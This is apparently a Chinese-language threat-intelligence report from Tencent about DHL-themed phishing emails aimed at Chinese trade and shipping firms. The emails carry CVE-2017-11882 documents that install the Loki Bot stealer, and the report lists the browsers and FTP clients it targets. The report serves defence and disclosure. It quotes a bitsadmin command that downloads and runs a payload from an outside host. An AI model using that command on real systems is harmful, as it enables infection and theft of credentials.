0×1 背景
腾讯御见威胁情报中心监测发现，近期针对中国进出口企业的网络攻击再次抬头。黑客攻击的目标是中国电子科技、外贸、远洋运输企业，攻击者发送精心准备的与企业业务相关的诱饵邮件，附件是利用Office漏洞（漏洞编号：CVE-2017-11882）特别定制的攻击文档，存在漏洞的电脑上打开附件会立刻中毒。漏洞触发后利用bitsadmin下载Loki Bot木马并执行，然后窃取受害人员各类账号密码等机密信息。
2017年12月5号，腾讯安全御见情报中心曾发布预警：一款针对外贸行业的“商贸信”病毒，将利用CVE-2017-11882漏洞的Word文档伪装成采购清单、帐单等文件，通过邮件在全球外贸行业内大量传播，仅一天时间国内就有约10万多国内用户收到此类钓鱼邮件。
2018年2月26日捕获到doc文档样本通过下载并运行已被公开源码的“波尼”木马，窃取用户比特币钱包文件等敏感信息，这些攻击文档同样利用了CVE-2017-11882漏洞。
最新的拦截数据表明，此类定向投放到中国进出口企业的攻击邮件每天有上千封之多，病毒变种也层出不穷。腾讯安全专家建议中国进出口相关企业务必高度警惕，采用必要的防御措施防止企业机密信息泄露。
攻击流程：

0×2 具体分析
诱饵邮件为伪装成国际物流公司DHL发出的寄件包裹确认信。对于运输业的从业人员而言，此类邮件有相当高的诱导性，很容易被认定为运输合作伙伴的信件。

内容直译：

附件doc内容：
 提示“Loading…”

空白图表

打开邮件doc文档，触发CVE-2017-11882漏洞，执行命令行
cmd.exe /c bitsadmin /transfer Fq /priority foreground hxxp://internationalcon.com/ar/home/eat.exe %USERPROFILE%/iWa.exe && start %USERPROFILE%/iWa.exe
bitsadmin.exe 可以用来在windows 命令行下下载文件，是windows 后台智能传输服务的一个工具，windows也会使用它来进行自动更新、下载补丁，此工具在黑客渗透攻击中也较为流行。

访问internationalcon.com发现该地址为阿联酋沙迦的某国际建筑设计公司网站，疑似被黑客攻击利用。

下载的exe样本采用aPLib加壳。nlo.exe为.net版；eat.exe为Delphi版，脱壳后都是“Loki Bot”木马。


“Loki Bot”是在地下网站上销售的商业恶意软件，功能为从受感染机器窃取私人数据，然后通过HTTP POST将该信息提交给控制主机。这些私人数据包括存储的密码，Web浏览器的登录凭证信息，以及各种加密货币钱包等。

装载功能：
启动（常驻装载机）
下载并运行（exe | dll）
下载和投递
更新木马
卸载木马
根据请求从控制端获取密码
加载到选定的国家
设置重新连接间隔
获取截图
支持的浏览器：
Internet Explorer
Mozilla Firefox (x32+x64)
Google Chrome
KMeleon
Comodo Dragon
Comodo IceDragon
SeaMonkey
Opera
Safari
CoolNovo
Rambler Nichrome
RockMelt
Baidu Spark
Chromium
Titan Browser
Torch Browser
Yandex.Browser
Epic Privacy Browser
Sleipnir Browser
Vivaldi
Coowon Browser
Superbird Browser
Chromodo Browser
Mustan Browser
360 Browser
Cyberfox (x32+x64)
Pale Moon
Maxthon browser
Citrio Browser
Chrome Canary
Waterfox
Orbitum
Iridium
支持的 FTP/VNC 客户端：
Total Commander
FlashFXP
FileZilla
FAR Manager
CyberDuck
Bitvise
NovaFTP
NetDrive
NppFTP
FTPShell
SherrodFTP
MyFTP
FTPBox
FtpInfo
Lines FTP
FullSync
Nexus File